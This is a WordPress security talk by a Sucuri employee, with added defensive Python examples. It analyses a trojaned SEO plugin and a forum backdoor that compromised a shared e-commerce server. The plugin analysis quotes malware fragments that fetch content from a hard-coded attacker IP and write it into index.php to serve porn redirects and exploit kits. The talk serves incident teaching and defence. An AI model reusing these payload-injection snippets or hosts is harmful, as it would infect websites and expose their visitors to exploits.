Learning From Website Hacks
WordPress Security
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
This is me!
o Sucuri Inc.
o Website Security
o Incident Handling
o Log Analysis
Let’s Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards
Scenario Uno (One)
The art of Phishing Naive Users
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?
Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au
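The red flag on this slide is mechanical enough to check before anyone clicks. The following is an added example (not Sucuri's code and not part of the talk): it pulls the anchors out of an email body and grades each download link on two signals from the slide, the host not being a WordPress.org download host, and the zip living inside some other site's wp-content directory. The `OFFICIAL_HOSTS` set, the placeholder domain `compromised-site.example` standing in for the redacted one, and the sample email are assumptions constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Hosts that legitimately serve WordPress.org plugin zips (assumption for this
# example; add your own trusted vendor hosts if you buy premium plugins).
OFFICIAL_HOSTS = {"wordpress.org", "downloads.wordpress.org"}


class _LinkExtractor(HTMLParser):
    """Collect (href, link text) pairs from a fragment of HTML."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    parser = _LinkExtractor()
    parser.feed(html)
    return parser.links


def assess_download_link(href):
    """Return the red flags for a plugin download link (empty list = looks official)."""
    url = urlparse(href)
    host = (url.hostname or "").lower()
    path = unquote(url.path)
    flags = []
    if host not in OFFICIAL_HOSTS:
        flags.append(f"host {host!r} is not an official WordPress.org download host")
    if "/wp-content/" in path:
        # A plugin zip sitting inside another site's wp-content is the classic
        # sign of a compromised host being used as a distribution point.
        flags.append("zip is served out of another site's wp-content directory")
    return flags


def triage_email(html):
    """Map every link in an email body to its list of red flags."""
    return {href: assess_download_link(href) for href, _text in extract_links(html)}


# Constructed sample: the lure from the talk with the redacted domain replaced by
# a placeholder, beside the shape of a genuine repository download URL.
PHISHING_EMAIL = (
    "<p>Happy holidays! Grab your free copy:</p>"
    '<A href="http://www.compromised-site.example/wp-content/'
    'all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>'
)
OFFICIAL_LINK = "https://downloads.wordpress.org/plugin/all-in-one-seo-pack.2.1.zip"

if __name__ == "__main__":
    for href, flags in triage_email(PHISHING_EMAIL).items():
        print(href, "->", flags or "no red flags")
    print(OFFICIAL_LINK, "->", assess_download_link(OFFICIAL_LINK) or "no red flags")
```

The host check is the one that matters: the link text said "All in One SEO Pack" but the zip was served from a stranger's site, and no amount of polish in the email changes where the bytes come from.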
Difference
o Pro Version?
o Legit Version?
Modified file: aioseop_class.php
Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
  $code_txt = 'http://91.239.15.61/o1.txt';
o Placing it in the files here:
  $index_path = $path.'/index.php';
  if(file_put_contents($index_path, $code)){
How?
o Index.php payload:
o Using curl to pull content from here:
  $url = 'http://91.239.15.61/java/google.php';
Payload
o Pulls content from:
  http://91.239.15.61/google.js - Redirection to Porn Sites
  http://91.239.15.61/g.php - Exploit Kits
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
Scenario Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce
o Quick setup of payment collection systems for goods
o Awesome, right?
Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophic
  o Blacklisting
  o Ban
o No more cash flow! No more Trust!
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment
vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common
Scenario
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server
Payload
Found here: /wp-admin/includes/list.php
How?
o It’s about the journey folks…
Scenario
o list.php?
o shop.txt?
That’s Interesting
/forum/ajax.php?edit=
vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
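"It's about the journey" is a log-analysis statement: the chain from `/forum/ajax.php?edit=` to a PHP file appearing under `/wp-admin/includes/` is visible in the web server's access log if someone looks. The following is an added example (not Sucuri's code and not part of the talk) that parses combined-format log lines, tags the two request shapes from the scenario, and reports client IPs that touched both the vBulletin and the WordPress side of the server. The log lines, timestamps and RFC 5737 addresses are constructed for the example; the `/forum/` prefix is an assumption matching the slide.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format; only the fields needed for triage.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request shapes from the scenario: vBulletin's ajax.php driven with an "edit"
# parameter, and a direct browser hit on a PHP file under wp-admin/includes,
# which WordPress only ever includes server-side and never serves directly.
VB_AJAX_EDIT = "vbulletin-ajax-edit"
WP_INCLUDES_HIT = "direct-hit-wp-admin-includes"
WP_INCLUDES_RE = re.compile(r"^/wp-admin/includes/[^/]+\.php$")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    parts = urlsplit(req["target"])
    req["path"] = parts.path
    req["query"] = parse_qs(parts.query, keep_blank_values=True)
    return req


def classify(req):
    """Label a request with one of the suspicious shapes, or None."""
    if req["path"].endswith("/forum/ajax.php") and "edit" in req["query"]:
        return VB_AJAX_EDIT
    if WP_INCLUDES_RE.match(req["path"]):
        return WP_INCLUDES_HIT
    return None


def analyze(lines):
    """Group suspicious hits per client IP and pick out IPs that crossed both apps."""
    per_ip = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        label = classify(req)
        if label:
            per_ip[req["ip"]].append((req["ts"], label, req["method"], req["target"]))
    chains = {ip: hits for ip, hits in per_ip.items()
              if {VB_AJAX_EDIT, WP_INCLUDES_HIT} <= {hit[1] for hit in hits}}
    return dict(per_ip), chains


# Constructed sample log: one ordinary visitor and one client walking the chain.
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Dec/2013:03:10:01 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2013:03:14:07 +0000] "POST /forum/ajax.php?edit= HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2013:03:14:09 +0000] "GET /forum/shop.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Dec/2013:03:15:30 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2013:03:16:45 +0000] "POST /wp-admin/includes/list.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2013:03:16:50 +0000] "GET /wp-admin/includes/list.php HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    per_ip, chains = analyze(SAMPLE_LOG)
    for ip, hits in chains.items():
        print(f"{ip} crossed from vBulletin into WordPress:")
        for ts, label, method, target in hits:
            print(f"  {ts}  {label:<30} {method} {target}")
```

The `shop.txt` fetch is deliberately left unflagged: a `.txt` download is ordinary on its own, and it only becomes interesting once the same client has been seen on both sides, which is exactly what the per-IP grouping surfaces. On a shared server the WordPress and vBulletin vhosts may log to different files; concatenate them before running this.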
Dump of Users
Attack Vector
o Access Control
Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
What can you do?
Let’s get proactive!
Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips…
Two Important Vectors
o Access control
  o Within your control…
o Software vulnerabilities
  o Not so much…
Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
  – Combine: Protection and Detection
Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Secure Solutions – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
o http://sucuri.net/signup
Software Vulnerabilities
o Trusted Sources
  o Start with the repo and established communities
  o If you’re not a developer this is going to be beyond your reach mostly
o Web Application Firewall (WAF) Plugins
  o Highly ineffective, evading and bypassing is easy
  o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!
  o Sucuri CloudProxy WAF
Auditing
• Know what is going on with your site
  – Integrity Checks
  – Logging in / Logging out
  – Changes being made
• More important than half the hardening tips you read online today
• Options:
  – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
  – Sucuri Premium Plugin http://wordpress.sucuri.net
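Both incidents in the talk would have shown up in an integrity check: scenario one as a changed `aioseop_class.php` and a rewritten `index.php`, scenario two as a `list.php` that was never part of `wp-admin/includes`. The following is an added example (not Sucuri's code, not the plugins listed above) of the minimal version of that check: hash every file under the site root into a baseline, store it off the site, and diff a fresh snapshot against it. The `demo()` function builds a constructed miniature WordPress tree in a temporary directory and replays the two cases; the file names inside it are those from the talk, the contents are placeholders.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, streamed so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def save_baseline(baseline, path):
    # Keep this file outside the web root: a baseline the attacker can edit is useless.
    Path(path).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def compare(baseline, current):
    """Return added / removed / modified relative paths between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo():
    """Constructed site tree; replays the two cases from the talk and returns the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "site"
        baseline_path = Path(tmp) / "baseline.json"   # stored beside, not inside, the site
        clean_files = {
            "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
            "wp-config.php": "<?php define('DB_NAME', 'example');\n",
            "wp-admin/includes/plugin.php": "<?php // core helper placeholder\n",
            "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php": "<?php // clean plugin file\n",
        }
        for rel, body in clean_files.items():
            (site / rel).parent.mkdir(parents=True, exist_ok=True)
            (site / rel).write_text(body)
        save_baseline(build_baseline(site), baseline_path)

        # Scenario one: the "Pro" zip ships a tampered plugin file that rewrites index.php.
        (site / "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php").write_text(
            "<?php // tampered plugin file placeholder\n")
        (site / "index.php").write_text("<?php // overwritten by the plugin payload (placeholder)\n")
        # Scenario two: a file dropped into wp-admin/includes from the neighbouring forum.
        (site / "wp-admin/includes/list.php").write_text("<?php // dropped file placeholder\n")

        return compare(load_baseline(baseline_path), build_baseline(site))


if __name__ == "__main__":
    report = demo()
    for kind in ("added", "removed", "modified"):
        for rel in report[kind]:
            print(f"{kind:<9} {rel}")
```

Run `build_baseline` right after a known-clean install or a verified restore and again on a schedule; anything in `added` under `wp-admin/` or `wp-includes/`, and anything in `modified` that you did not update yourself, is worth a look before the next step of the attacker's journey happens. Legitimate core and plugin updates will also show up, so re-baseline after each one you performed.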
If all else fails…
o Be sure you have backups…
  o VaultPress – WordPress Sites
  o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
Tony Perez @perezbox | @sucuri_security
[email protected] #wordsesh